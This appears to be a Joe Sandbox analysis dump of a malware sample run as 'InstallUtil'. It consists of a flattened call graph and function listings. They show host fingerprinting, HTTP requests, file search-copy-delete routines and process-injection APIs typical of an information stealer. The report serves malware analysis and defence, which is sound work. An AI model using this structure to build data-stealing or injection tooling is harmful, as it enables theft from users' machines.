4063d6 92409->92410 92411 41058d lstrcpyA 92410->92411 92412 4063e1 92411->92412 92413 410609 3 API calls 92412->92413 92414 406403 92413->92414 92415 41058d lstrcpyA 92414->92415 92416 40640e 92415->92416 92417 410609 3 API calls 92416->92417 92418 40642f 92417->92418 92419 41058d lstrcpyA 92418->92419 92420 40643a 92419->92420 92421 410609 3 API calls 92420->92421 92422 40645b 92421->92422 92423 41058d lstrcpyA 92422->92423 92424 406466 92423->92424 92425 410609 3 API calls 92424->92425 92426 406487 92425->92426 92427 41058d lstrcpyA 92426->92427 92428 406492 92427->92428 92429 410609 3 API calls 92428->92429 92430 4064b3 92429->92430 92431 41058d lstrcpyA 92430->92431 92432 4064be 92431->92432 92433 410609 3 API calls 92432->92433 92434 4064df 92433->92434 92435 41058d lstrcpyA 92434->92435 92436 4064ea 92435->92436 92437 4105c7 2 API calls 92436->92437 92438 406506 92437->92438 92439 41058d lstrcpyA 92438->92439 92440 406511 92439->92440 92441 410609 3 API calls 92440->92441 92442 406532 92441->92442 92443 41058d lstrcpyA 92442->92443 92444 40653d 92443->92444 92445 410609 3 API calls 92444->92445 92446 40655f 92445->92446 92447 41058d lstrcpyA 92446->92447 92448 40656a 92447->92448 92449 410609 3 API calls 92448->92449 92450 40658b 92449->92450 92451 41058d lstrcpyA 92450->92451 92452 406596 92451->92452 92453 410609 3 API calls 92452->92453 92454 4065b7 92453->92454 92455 41058d lstrcpyA 92454->92455 92456 4065c2 92455->92456 92457 4105c7 2 API calls 92456->92457 92458 4065e1 92457->92458 92459 41058d lstrcpyA 92458->92459 92460 4065ec 92459->92460 92461 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 92460->92461 93385 427050 92461->93385 92464 427050 _memmove 92465 406667 lstrlenA HttpSendRequestA 92464->92465 92466 4066d2 InternetReadFile 92465->92466 92467 4066ec InternetCloseHandle 92466->92467 92469 406692 92466->92469 92467->92366 92468 410609 3 API calls 92468->92469 92469->92466 92469->92467 92469->92468 92470 41058d lstrcpyA 92469->92470 92470->92469 92472 4134cc 92471->92472 92473 41346e 92471->92473 92472->91135 92474 410549 2 API calls 92473->92474 92475 4134b6 strtok_s 92473->92475 92476 410549 2 API calls 92473->92476 92474->92475 92475->92472 92475->92473 92476->92473 92480 413286 92477->92480 92478 413385 92478->91149 92479 413332 StrCmpCA 92479->92480 92480->92478 92480->92479 92481 410549 2 API calls 92480->92481 92482 413367 strtok_s 92480->92482 92483 413301 StrCmpCA 92480->92483 92484 4132dc StrCmpCA 92480->92484 92485 4132ab StrCmpCA 92480->92485 92481->92480 92482->92480 92483->92480 92484->92480 92485->92480 92487 413434 92486->92487 92489 4133bc 92486->92489 92487->91161 92488 4133e2 StrCmpCA 92488->92489 92489->92488 92490 410549 2 API calls 92489->92490 92491 41341a strtok_s 92489->92491 92492 410549 2 API calls 92489->92492 92490->92491 92491->92487 92491->92489 92492->92489 92494 4104e7 lstrcpyA 92493->92494 92495 413b9f 92494->92495 92496 410609 3 API calls 92495->92496 92497 413baf 92496->92497 92498 41058d lstrcpyA 92497->92498 92499 413bb7 92498->92499 92500 410609 3 API calls 92499->92500 92501 413bcf 92500->92501 92502 41058d lstrcpyA 92501->92502 92503 413bd7 92502->92503 92504 410609 3 API calls 92503->92504 92505 413bef 92504->92505 92506 41058d lstrcpyA 92505->92506 92507 413bf7 92506->92507 92508 410609 3 API calls 92507->92508 92509 413c0f 92508->92509 92510 41058d lstrcpyA 92509->92510 92511 413c17 92510->92511 92512 410609 3 API calls 92511->92512 92513 413c2f 92512->92513 92514 41058d lstrcpyA 92513->92514 92515 413c37 92514->92515 93392 410cc0 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 92515->93392 92518 410609 3 API calls 92519 413c50 92518->92519 92520 41058d lstrcpyA 92519->92520 92521 413c58 92520->92521 92522 410609 3 API calls 92521->92522 92523 413c70 92522->92523 92524 41058d lstrcpyA 92523->92524 92525 413c78 92524->92525 92526 410609 3 API calls 92525->92526 92527 413c90 92526->92527 92528 41058d lstrcpyA 92527->92528 92529 413c98 92528->92529 93395 4115d4 92529->93395 92532 410609 3 API calls 92533 413cb1 92532->92533 92534 41058d lstrcpyA 92533->92534 92535 413cb9 92534->92535 92536 410609 3 API calls 92535->92536 92537 413cd1 92536->92537 92538 41058d lstrcpyA 92537->92538 92539 413cd9 92538->92539 92540 410609 3 API calls 92539->92540 92541 413cf1 92540->92541 92542 41058d lstrcpyA 92541->92542 92543 413cf9 92542->92543 92544 411684 11 API calls 92543->92544 92545 413d09 92544->92545 92546 4105c7 2 API calls 92545->92546 92547 413d16 92546->92547 92548 41058d lstrcpyA 92547->92548 92549 413d1e 92548->92549 92550 410609 3 API calls 92549->92550 92551 413d3e 92550->92551 92552 41058d lstrcpyA 92551->92552 92553 413d46 92552->92553 92554 410609 3 API calls 92553->92554 92555 413d5e 92554->92555 92556 41058d lstrcpyA 92555->92556 92557 413d66 92556->92557 92558 4109a2 19 API calls 92557->92558 92559 413d76 92558->92559 92560 4105c7 2 API calls 92559->92560 92561 413d83 92560->92561 92562 41058d lstrcpyA 92561->92562 92563 413d8b 92562->92563 92564 410609 3 API calls 92563->92564 92565 413dab 92564->92565 92566 41058d lstrcpyA 92565->92566 92567 413db3 92566->92567 92568 410609 3 API calls 92567->92568 92569 413dcb 92568->92569 92570 41058d lstrcpyA 92569->92570 92571 413dd3 92570->92571 92572 413ddb GetCurrentProcessId 92571->92572 93402 41224a OpenProcess 92572->93402 92575 4105c7 2 API calls 92576 413df8 92575->92576 92577 41058d lstrcpyA 92576->92577 92578 413e00 92577->92578 92579 410609 3 API calls 92578->92579 92580 413e20 92579->92580 92581 41058d lstrcpyA 92580->92581 92582 413e28 92581->92582 92583 410609 3 API calls 92582->92583 92584 413e40 92583->92584 92585 41058d lstrcpyA 92584->92585 92586 413e48 92585->92586 92587 410609 3 API calls 92586->92587 92588 413e60 92587->92588 92589 41058d lstrcpyA 92588->92589 92590 413e68 92589->92590 92591 410609 3 API calls 92590->92591 92592 413e80 92591->92592 92593 41058d lstrcpyA 92592->92593 92594 413e88 92593->92594 93409 410b30 GetProcessHeap HeapAlloc 92594->93409 92597 410609 3 API calls 92598 413ea1 92597->92598 92599 41058d lstrcpyA 92598->92599 92600 413ea9 92599->92600 92601 410609 3 API calls 92600->92601 92602 413ec1 92601->92602 92603 41058d lstrcpyA 92602->92603 92604 413ec9 92603->92604 92605 410609 3 API calls 92604->92605 92606 413ee1 92605->92606 92607 41058d lstrcpyA 92606->92607 92608 413ee9 92607->92608 93416 411807 92608->93416 92611 4105c7 2 API calls 92612 413f06 92611->92612 92613 41058d lstrcpyA 92612->92613 92614 413f0e 92613->92614 92615 410609 3 API calls 92614->92615 92616 413f2e 92615->92616 92617 41058d lstrcpyA 92616->92617 92618 413f36 92617->92618 92619 410609 3 API calls 92618->92619 92620 413f4e 92619->92620 92621 41058d lstrcpyA 92620->92621 92622 413f56 92621->92622 93433 411997 92622->93433 92624 413f67 92625 4105c7 2 API calls 92624->92625 92626 413f75 92625->92626 92627 41058d lstrcpyA 92626->92627 92628 413f7d 92627->92628 92629 410609 3 API calls 92628->92629 92630 413f9d 92629->92630 92631 41058d lstrcpyA 92630->92631 92632 413fa5 92631->92632 92633 410609 3 API calls 92632->92633 92634 413fbd 92633->92634 92635 41058d lstrcpyA 92634->92635 92636 413fc5 92635->92636 92637 410c85 3 API calls 92636->92637 92638 413fd2 92637->92638 92639 410609 3 API calls 92638->92639 92640 413fde 92639->92640 92641 41058d lstrcpyA 92640->92641 92642 413fe6 92641->92642 92643 410609 3 API calls 92642->92643 92644 413ffe 92643->92644 92645 41058d lstrcpyA 92644->92645 92646 414006 92645->92646 92647 410609 3 API calls 92646->92647 92648 41401e 92647->92648 92649 41058d lstrcpyA 92648->92649 92650 414026 92649->92650 93448 410c53 GetProcessHeap HeapAlloc GetUserNameA 92650->93448 92652 414033 92653 410609 3 API calls 92652->92653 92654 41403f 92653->92654 92655 41058d lstrcpyA 92654->92655 92656 414047 92655->92656 92657 410609 3 API calls 92656->92657 92658 41405f 92657->92658 92659 41058d lstrcpyA 92658->92659 92660 414067 92659->92660 92661 410609 3 API calls 92660->92661 92662 41407f 92661->92662 92663 41058d lstrcpyA 92662->92663 92664 414087 92663->92664 93449 411563 7 API calls 92664->93449 92667 4105c7 2 API calls 92668 4140a6 92667->92668 92669 41058d lstrcpyA 92668->92669 92670 4140ae 92669->92670 92671 410609 3 API calls 92670->92671 92672 4140ce 92671->92672 92673 41058d lstrcpyA 92672->92673 92674 4140d6 92673->92674 92675 410609 3 API calls 92674->92675 92676 4140ee 92675->92676 92677 41058d lstrcpyA 92676->92677 92678 4140f6 92677->92678 93452 410ddb 92678->93452 92681 4105c7 2 API calls 92682 414113 92681->92682 92683 41058d lstrcpyA 92682->92683 92684 41411b 92683->92684 92685 410609 3 API calls 92684->92685 92686 41413b 92685->92686 92687 41058d lstrcpyA 92686->92687 92688 414143 92687->92688 92689 410609 3 API calls 92688->92689 92690 41415b 92689->92690 92691 41058d lstrcpyA 92690->92691 92692 414163 92691->92692 92693 410cc0 9 API calls 92692->92693 92694 414170 92693->92694 92695 410609 3 API calls 92694->92695 92696 41417c 92695->92696 92697 41058d lstrcpyA 92696->92697 92698 414184 92697->92698 92699 410609 3 API calls 92698->92699 92700 41419c 92699->92700 92701 41058d lstrcpyA 92700->92701 92702 4141a4 92701->92702 92703 410609 3 API calls 92702->92703 92704 4141bc 92703->92704 92705 41058d lstrcpyA 92704->92705 92706 4141c4 92705->92706 93464 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 92706->93464 92709 410609 3 API calls 92710 4141dd 92709->92710 92711 41058d lstrcpyA 92710->92711 92712 4141e5 92711->92712 92713 410609 3 API calls 92712->92713 92714 4141fd 92713->92714 92715 41058d lstrcpyA 92714->92715 92716 414205 92715->92716 92717 410609 3 API calls 92716->92717 92718 41421d 92717->92718 92719 41058d lstrcpyA 92718->92719 92720 414225 92719->92720 92721 410609 3 API calls 92720->92721 92722 41423d 92721->92722 92723 41058d lstrcpyA 92722->92723 92724 414245 92723->92724 93469 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 92724->93469 92726 414252 92727 410609 3 API calls 92726->92727 92728 41425e 92727->92728 92729 41058d lstrcpyA 92728->92729 92730 414266 92729->92730 92731 410609 3 API calls 92730->92731 92732 41427e 92731->92732 92733 41058d lstrcpyA 92732->92733 92734 414286 92733->92734 92735 410609 3 API calls 92734->92735 92736 41429e 92735->92736 92737 41058d lstrcpyA 92736->92737 92738 4142a6 92737->92738 93472 411007 92738->93472 92741 410609 3 API calls 92742 4142bf 92741->92742 92743 41058d lstrcpyA 92742->92743 92744 4142c7 92743->92744 92745 410609 3 API calls 92744->92745 92746 4142df 92745->92746 92747 41058d lstrcpyA 92746->92747 92748 4142e7 92747->92748 92749 410609 3 API calls 92748->92749 92750 4142ff 92749->92750 92751 41058d lstrcpyA 92750->92751 92752 414307 92751->92752 93489 410fba GetSystemInfo wsprintfA 92752->93489 92755 410609 3 API calls 92756 414320 92755->92756 92757 41058d lstrcpyA 92756->92757 92758 414328 92757->92758 92759 410609 3 API calls 92758->92759 92760 414340 92759->92760 92761 41058d lstrcpyA 92760->92761 92762 414348 92761->92762 92763 410609 3 API calls 92762->92763 92764 414360 92763->92764 92765 41058d lstrcpyA 92764->92765 92766 414368 92765->92766 93492 411119 GetProcessHeap HeapAlloc 92766->93492 92769 410609 3 API calls 92770 414381 92769->92770 92771 41058d lstrcpyA 92770->92771 92772 414389 92771->92772 92773 410609 3 API calls 92772->92773 92774 4143a4 92773->92774 92775 41058d lstrcpyA 92774->92775 92776 4143ac 92775->92776 92777 410609 3 API calls 92776->92777 92778 4143c7 92777->92778 92779 41058d lstrcpyA 92778->92779 92780 4143cf 92779->92780 93499 411192 92780->93499 92783 4105c7 2 API calls 92784 4143ef 92783->92784 92785 41058d lstrcpyA 92784->92785 92786 4143f7 92785->92786 92787 410609 3 API calls 92786->92787 92788 41441a 92787->92788 92789 41058d lstrcpyA 92788->92789 92790 414422 92789->92790 92791 410609 3 API calls 92790->92791 92792 41443a 92791->92792 92793 41058d lstrcpyA 92792->92793 92794 414442 92793->92794 93507 4114a5 92794->93507 92797 4105c7 2 API calls 92798 414462 92797->92798 92799 41058d lstrcpyA 92798->92799 92800 41446a 92799->92800 92801 410609 3 API calls 92800->92801 92802 414490 92801->92802 92803 41058d lstrcpyA 92802->92803 92804 414498 92803->92804 92805 410609 3 API calls 92804->92805 92806 4144b3 92805->92806 92807 41058d lstrcpyA 92806->92807 92808 4144bb 92807->92808 93517 411203 92808->93517 92811 4105c7 2 API calls 92812 4144e0 92811->92812 92813 41058d lstrcpyA 92812->92813 92814 4144e8 92813->92814 92815 411203 21 API calls 92814->92815 92816 414509 92815->92816 92817 4105c7 2 API calls 92816->92817 92818 414518 92817->92818 92819 41058d lstrcpyA 92818->92819 92820 414520 92819->92820 92821 410609 3 API calls 92820->92821 92822 414543 92821->92822 92823 41058d lstrcpyA 92822->92823 92824 41454b 92823->92824 92825 401cfd lstrcpyA 92824->92825 92826 414560 lstrlenA 92825->92826 92827 4104e7 lstrcpyA 92826->92827 92828 41457d 92827->92828 93537 416e97 92828->93537 93338->92022 93340 41d016 setSBUpLow 5 API calls 93339->93340 93341 412601 93340->93341 93341->91243 93341->91250 93343 4104e7 lstrcpyA 93342->93343 93344 402a05 93343->93344 93344->92123 93346 4104e7 lstrcpyA 93345->93346 93347 402a16 93346->93347 93347->92123 93349 4104e7 lstrcpyA 93348->93349 93350 402a27 93349->93350 93350->92123 93352 410519 lstrcpyA 93351->93352 93353 416dac 93352->93353 93354 410519 lstrcpyA 93353->93354 93355 416db7 93354->93355 93356 410519 lstrcpyA 93355->93356 93357 416dc2 93356->93357 93357->92124 93358->92123 93359->92123 93360->92123 93362 4116ad 93361->93362 93363 41173c 93361->93363 93365 4104e7 lstrcpyA 93362->93365 93364 4104e7 lstrcpyA 93363->93364 93367 411748 93364->93367 93366 4116c0 _memset 93365->93366 93378 4123d5 lstrcpyA malloc strncpy 93366->93378 93368 41d016 setSBUpLow 5 API calls 93367->93368 93369 411755 93368->93369 93369->92146 93371 4116ea lstrcatA 93379 402920 93371->93379 93373 411707 lstrcatA 93374 411724 93373->93374 93375 4104e7 lstrcpyA 93374->93375 93376 411732 93375->93376 93376->93367 93377->92149 93378->93371 93380 402924 93379->93380 93380->93373 93382 404ac4 93381->93382 93382->93382 93383 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 93382->93383 93384 404b27 93383->93384 93384->92158 93386 40663e lstrlenA lstrlenA 93385->93386 93386->92464 93388 40806a LocalAlloc 93387->93388 93389 406724 93387->93389 93388->93389 93390 40807a CryptStringToBinaryA 93388->93390 93389->92326 93389->92338 93390->93389 93391 408091 LocalFree 93390->93391 93391->93389 93393 41d016 setSBUpLow 5 API calls 93392->93393 93394 410d2c 93393->93394 93394->92518 93554 423c10 93395->93554 93398 411651 RegCloseKey CharToOemA 93400 41d016 setSBUpLow 5 API calls 93398->93400 93399 411630 RegQueryValueExA 93399->93398 93401 411682 93400->93401 93401->92532 93403 412294 93402->93403 93404 412278 K32GetModuleFileNameExA CloseHandle 93402->93404 93405 4104e7 lstrcpyA 93403->93405 93404->93403 93406 4122a0 93405->93406 93407 41d016 setSBUpLow 5 API calls 93406->93407 93408 4122ae 93407->93408 93408->92575 93556 410c16 93409->93556 93412 410b63 RegOpenKeyExA 93414 410b83 RegQueryValueExA 93412->93414 93415 410b9b RegCloseKey 93412->93415 93413 410b5c 93413->92597 93414->93415 93415->93413 93563 42f109 93416->93563 93418 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 93419 41186b 93418->93419 93420 411873 CoSetProxyBlanket 93419->93420 93424 411964 93419->93424 93426 4118a3 93420->93426 93421 4104e7 lstrcpyA 93422 41198f 93421->93422 93423 42f165 5 API calls 93422->93423 93425 411996 93423->93425 93424->93421 93425->92611 93426->93424 93427 4118d7 VariantInit 93426->93427 93428 4118f6 93427->93428 93564 411757 93428->93564 93430 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 93431 4104e7 lstrcpyA 93430->93431 93432 411958 VariantClear 93431->93432 93432->93422 93573 42f09d 93433->93573 93435 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 93436 4119f9 93435->93436 93437 411a01 CoSetProxyBlanket 93436->93437 93438 411a93 93436->93438 93440 411a31 93437->93440 93439 4104e7 lstrcpyA 93438->93439 93441 411abe 93439->93441 93440->93438 93442 411a59 VariantInit 93440->93442 93441->92624 93443 411a78 93442->93443 93574 411d42 LocalAlloc CharToOemW 93443->93574 93445 411a80 93446 4104e7 lstrcpyA 93445->93446 93447 411a87 VariantClear 93446->93447 93447->93441 93448->92652 93450 4104e7 lstrcpyA 93449->93450 93451 4115cd 93450->93451 93451->92667 93453 4104e7 lstrcpyA 93452->93453 93454 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 93453->93454 93462 410e3c 93454->93462 93463 410eed 93454->93463 93455 410e42 GetLocaleInfoA 93455->93462 93456 410f05 93458 41d016 setSBUpLow 5 API calls 93456->93458 93457 410ef9 LocalFree 93457->93456 93460 410f15 93458->93460 93459 410609 lstrlenA lstrcpyA lstrcatA 93459->93462 93460->92681 93461 41058d lstrcpyA 93461->93462 93462->93455 93462->93459 93462->93461 93462->93463 93463->93456 93463->93457 93465 410d86 93464->93465 93466 410d6a wsprintfA 93464->93466 93467 41d016 setSBUpLow 5 API calls 93465->93467 93466->93465 93468 410d93 93467->93468 93468->92709 93470 410f94 RegQueryValueExA 93469->93470 93471 410fac RegCloseKey 93469->93471 93470->93471 93471->92726 93473 41107c GetLogicalProcessorInformationEx 93472->93473 93474 411048 GetLastError 93473->93474 93475 411087 93473->93475 93476 4110f3 93474->93476 93477 411057 93474->93477 93577 411b5b GetProcessHeap HeapFree 93475->93577 93478 4110fd 93476->93478 93578 411b5b GetProcessHeap HeapFree 93476->93578 93486 41105b 93477->93486 93484 41d016 setSBUpLow 5 API calls 93478->93484 93482 4110c0 93482->93478 93485 4110c9 wsprintfA 93482->93485 93488 411117 93484->93488 93485->93478 93486->93473 93487 4110ec 93486->93487 93575 411b5b GetProcessHeap HeapFree 93486->93575 93576 411b78 GetProcessHeap HeapAlloc 93486->93576 93487->93478 93488->92741 93490 41d016 setSBUpLow 5 API calls 93489->93490 93491 411005 93490->93491 93491->92755 93579 411b26 93492->93579 93495 41115f wsprintfA 93497 41d016 setSBUpLow 5 API calls 93495->93497 93498 411190 93497->93498 93498->92769 93500 4104e7 lstrcpyA 93499->93500 93506 4111b3 93500->93506 93501 4111df EnumDisplayDevicesA 93502 4111f3 93501->93502 93501->93506 93503 41d016 setSBUpLow 5 API calls 93502->93503 93505 411201 93503->93505 93504 410549 2 API calls 93504->93506 93505->92783 93506->93501 93506->93502 93506->93504 93508 4104e7 lstrcpyA 93507->93508 93509 4114c6 CreateToolhelp32Snapshot Process32First 93508->93509 93510 41154c CloseHandle 93509->93510 93516 4114ee 93509->93516 93511 41d016 setSBUpLow 5 API calls 93510->93511 93513 411561 93511->93513 93512 41153a Process32Next 93512->93510 93512->93516 93513->92797 93514 41058d lstrcpyA 93514->93516 93515 410609 lstrlenA lstrcpyA lstrcatA 93515->93516 93516->93512 93516->93514 93516->93515 93518 4104e7 lstrcpyA 93517->93518 93519 41123b RegOpenKeyExA 93518->93519 93520 411478 93519->93520 93536 411281 93519->93536 93522 410519 lstrcpyA 93520->93522 93521 411287 RegEnumKeyExA 93523 4112c4 wsprintfA RegOpenKeyExA 93521->93523 93521->93536 93524 411489 93522->93524 93526 411460 RegCloseKey 93523->93526 93527 41130a RegQueryValueExA 93523->93527 93531 41d016 setSBUpLow 5 API calls 93524->93531 93525 41145e 93528 41146c RegCloseKey 93525->93528 93526->93528 93529 411440 RegCloseKey 93527->93529 93530 411340 lstrlenA 93527->93530 93528->93520 93529->93536 93530->93529 93530->93536 93532 4114a3 93531->93532 93532->92811 93533 410609 lstrlenA lstrcpyA lstrcatA 93533->93536 93534 41058d lstrcpyA 93534->93536 93535 4113b0 RegQueryValueExA 93535->93529 93535->93536 93536->93521 93536->93525 93536->93529 93536->93533 93536->93534 93536->93535 93538 416ea7 93537->93538 93539 41058d lstrcpyA 93538->93539 93540 416ec4 93539->93540 93541 41058d lstrcpyA 93540->93541 93555 41160c RegOpenKeyExA 93554->93555 93555->93398 93555->93399 93559 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 93556->93559 93558 410b58 93558->93412 93558->93413 93560 410c03 RegCloseKey 93559->93560 93561 410bec RegQueryValueExA 93559->93561 93562 410c13 93560->93562 93561->93560 93562->93558 93563->93418 93572 42f09d 93564->93572 93566 411763 CoCreateInstance 93567 41178b SysAllocString 93566->93567 93568 4117e7 93566->93568 93567->93568 93570 41179a 93567->93570 93568->93430 93569 4117e0 SysFreeString 93569->93568 93570->93569 93571 4117be _wtoi64 SysFreeString 93570->93571 93571->93569 93572->93566 93573->93435 93574->93445 93575->93486 93576->93486 93577->93482 93578->93478 93580 41114d GlobalMemoryStatusEx 93579->93580 93580->93495

                                                                                                                  Executed Functions

                                                                                                                  Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                  • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                  • API String ID: 2238633743-2740034357
                                                                                                                  • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                  • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                  • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                  • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19
                                                                                                                  Function 00414CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1168 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 1175 414d75-414d89 StrCmpCA 1168->1175 1176 41512b-415141 call 401cde call 41d016 1168->1176 1177 4150f8-41510d FindNextFileA 1175->1177 1178 414d8f-414da3 StrCmpCA 1175->1178 1180 41511f-415125 FindClose 1177->1180 1181 41510f-415111 1177->1181 1178->1177 1182 414da9-414deb wsprintfA StrCmpCA 1178->1182 1180->1176 1181->1175 1184 414e0a-414e1c wsprintfA 1182->1184 1185 414ded-414e08 wsprintfA 1182->1185 1187 414e1f-414e5c call 423c10 lstrcatA 1184->1187 1185->1187 1191 414e82-414e89 strtok_s 1187->1191 1192 414e8b-414ec9 call 423c10 lstrcatA strtok_s 1191->1192 1193 414e5e-414e6f 1191->1193 1197 415089-41508d 1192->1197 1198 414ecf-414edf PathMatchSpecA 1192->1198 1193->1197 1199 414e75-414e81 1193->1199 1197->1177 1202 41508f-415095 1197->1202 1200 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 DeleteFileA CopyFileA call 412166 call 42efc0 1198->1200 1201 414fd9-414fee strtok_s 1198->1201 1199->1191 1238 414fc0-414fd4 DeleteFileA call 402920 1200->1238 1239 414ff9-415005 1200->1239 1201->1198 1204 414ff4 1201->1204 1202->1180 1205 41509b-4150a9 1202->1205 1204->1197 1205->1177 1207 4150ab-4150ed call 401cfd call 414cc8 1205->1207 1215 4150f2 1207->1215 1215->1177 1238->1201 1241 415116-41511d call 402920 1239->1241 1242 41500b-415031 call 410519 call 407fac 1239->1242 1241->1176 1250 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 1242->1250 1251 41507d-415084 call 402920 1242->1251 1250->1251 1251->1197
                                                                                                                  APIs
                                                                                                                  • wsprintfA.USER32 ref: 00414D1C
                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                  • _memset.LIBCMT ref: 00414D4F
                                                                                                                  • _memset.LIBCMT ref: 00414D60
                                                                                                                  • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                  • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                  • wsprintfA.USER32 ref: 00414DC2
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                  • wsprintfA.USER32 ref: 00414DFF
                                                                                                                  • wsprintfA.USER32 ref: 00414E16
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • _memset.LIBCMT ref: 00414E28
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                  • strtok_s.MSVCRT ref: 00414E82
                                                                                                                  • _memset.LIBCMT ref: 00414E94
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                  • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                  • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                    • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                  • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                  • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                  • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                  • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
